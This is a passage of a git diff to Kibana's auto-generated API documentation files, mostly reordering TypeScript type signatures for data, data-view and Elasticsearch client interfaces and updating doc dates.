"section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/types.ts", "deprecated": false 
@@ -697,15 +697,15 @@ "\nSearch sessions SO CRUD\n{@link ISessionsClient}" ], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -735,7 +735,7 @@ "section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/types.ts", "deprecated": false 
@@ -1212,15 +1212,15 @@ "label": "ISessionsClient", "description": [], "signature": [ - "{ create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", + "{ get: (sessionId: string) => Promise<", + "SearchSessionSavedObject", + ">; delete: (sessionId: string) => Promise; create: ({ name, appId, locatorId, initialState, restoreState, sessionId, }: { name: string; appId: string; locatorId: string; initialState: Record; restoreState: Record; sessionId: string; }) => Promise<", "SearchSessionSavedObject", ">; find: (options: Omit<", "SavedObjectsFindOptions", ", \"type\">) => Promise<", "SavedObjectsFindResponse", - ">; get: (sessionId: string) => Promise<", - "SearchSessionSavedObject", - ">; update: (sessionId: string, attributes: unknown) => Promise<", + ">; update: (sessionId: string, attributes: unknown) => Promise<", "SavedObjectsUpdateResponse", "<", { @@ -1250,7 +1250,7 @@ "section": "def-common.SearchSessionSavedObjectAttributes", "text": "SearchSessionSavedObjectAttributes" }, - ", unknown>>; delete: (sessionId: string) => Promise; }" + ", unknown>>; }" ], "path": "src/plugins/data/public/search/session/sessions_client.ts", "deprecated": false, @@ -2720,9 +2720,9 @@ "label": "options", "description": [], "signature": [ - "{ filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; searchAfter?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; sortOrder?: ", + "> | undefined; fields?: string[] | undefined; searchAfter?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; sortOrder?: ", "SortOrder", " | undefined; searchFields?: string[] | undefined; rootSearchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", 
@@ -20389,7 +20389,7 @@ "label": "exclude", "description": [], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "src/plugins/data/common/search/aggs/buckets/terms.ts", "deprecated": false @@ -20402,7 +20402,7 @@ "label": "include", "description": [], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "src/plugins/data/common/search/aggs/buckets/terms.ts", "deprecated": false @@ -20481,7 +20481,7 @@ "label": "aggregate", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"concat\" | \"average\"" + "\"min\" | \"max\" | \"concat\" | \"sum\" | \"average\"" ], "path": "src/plugins/data/common/search/aggs/metrics/top_hit.ts", "deprecated": false @@ -26188,9 +26188,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: {} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_config.ts", "deprecated": false, @@ -27004,9 +27004,9 @@ "section": "def-common.IAggType", "text": "IAggType" }, - "; id?: string | undefined; enabled?: boolean | undefined; params?: {} | ", + "; params?: {} | ", "SerializableRecord", - " | undefined; schema?: string | undefined; }" + " | undefined; id?: string | undefined; enabled?: boolean | undefined; schema?: string | undefined; }" ], "path": "src/plugins/data/common/search/aggs/agg_configs.ts", "deprecated": false, 
@@ -29647,7 +29647,7 @@ "label": "SearchTypes", "description": [], "signature": [ - "string | number | boolean | object | number[] | string[] | boolean[] | object[] | undefined" + "string | number | boolean | object | string[] | number[] | boolean[] | object[] | undefined" ], "path": "src/plugins/data/common/search/expressions/eql_raw_response.ts", "deprecated": false, diff --git a/api_docs/data_search.mdx b/api_docs/data_search.mdx index 87964f2418b35..d66fb67babbb6 100644 --- a/api_docs/data_search.mdx +++ b/api_docs/data_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/data-search title: "data.search" image: https://source.unsplash.com/400x175/?github description: API docs for the data.search plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'data.search'] --- import dataSearchObj from './data_search.devdocs.json'; diff --git a/api_docs/data_view_editor.mdx b/api_docs/data_view_editor.mdx index 211f3984ffd60..7a59dde802705 100644 --- a/api_docs/data_view_editor.mdx +++ b/api_docs/data_view_editor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewEditor title: "dataViewEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewEditor'] --- import dataViewEditorObj from './data_view_editor.devdocs.json'; diff --git a/api_docs/data_view_field_editor.mdx b/api_docs/data_view_field_editor.mdx index d18283ff056dc..9c663b8898178 100644 --- a/api_docs/data_view_field_editor.mdx +++ b/api_docs/data_view_field_editor.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewFieldEditor title: "dataViewFieldEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewFieldEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewFieldEditor'] --- import dataViewFieldEditorObj from './data_view_field_editor.devdocs.json'; diff --git a/api_docs/data_view_management.mdx b/api_docs/data_view_management.mdx index ceb11e5b63c5f..ec132aee9cb52 100644 --- a/api_docs/data_view_management.mdx +++ b/api_docs/data_view_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/dataViewManagement title: "dataViewManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the dataViewManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'dataViewManagement'] --- import dataViewManagementObj from './data_view_management.devdocs.json'; diff --git a/api_docs/data_views.devdocs.json b/api_docs/data_views.devdocs.json index 76d1d27fa620f..8dd55e506010a 100644 --- a/api_docs/data_views.devdocs.json +++ b/api_docs/data_views.devdocs.json 
@@ -10858,7 +10858,61 @@ "label": "elasticsearchClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -10926,7 +10976,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", 
@@ -10952,33 +11002,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -11004,33 +11028,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -11990,6 +11988,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", 
@@ -16549,7 +16549,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | 
\"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | 
\"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | 
\"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | 
\"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", @@ -19748,7 +19748,7 @@ "label": "DataViewSavedObjectAttrs", "description": [], "signature": [ - "{ type?: string | undefined; name?: string | undefined; title: string; typeMeta?: string | undefined; }" + "{ type?: string | undefined; title: string; name?: string | undefined; typeMeta?: string | undefined; }" ], "path": "src/plugins/data_views/common/data_views/data_views.ts", "deprecated": false, @@ -19764,23 +19764,23 @@ "\nData views service interface" ], "signature": [ - "{ create: ({ id, name, title, ...restOfSpec }: ", + "{ get: (id: string) => Promise<", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataViewSpec", - "text": "DataViewSpec" + "section": "def-common.DataView", + "text": "DataView" }, - ", skipFetchFields?: boolean) => Promise<", + ">; delete: (indexPatternId: string) => Promise<{}>; create: ({ id, name, title, ...restOfSpec }: ", { "pluginId": "dataViews", "scope": "common", "docId": "kibDataViewsPluginApi", - "section": "def-common.DataView", - "text": "DataView" + "section": "def-common.DataViewSpec", + "text": "DataViewSpec" }, - ">; find: (search: string, size?: number) => Promise<", + ", skipFetchFields?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", 
@@ -19788,7 +19788,7 @@ "section": "def-common.DataView", "text": "DataView" }, - "[]>; get: (id: string) => Promise<", + ">; find: (search: string, size?: number) => Promise<", { "pluginId": "dataViews", "scope": "common", @@ -19796,7 +19796,7 @@ "section": "def-common.DataView", "text": "DataView" }, - ">; delete: (indexPatternId: string) => Promise<{}>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", + "[]>; getCanSave: () => Promise; getIds: (refresh?: boolean) => Promise; getTitles: (refresh?: boolean) => Promise; getIdsWithTitle: (refresh?: boolean) => Promise<", { "pluginId": "dataViews", "scope": "common", 
@@ -20309,7 +20309,7 @@ "signature": [ "Pick<", "Toast", - ", \"children\" | \"color\" | \"className\" | \"lang\" | \"style\" | \"role\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | 
\"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | 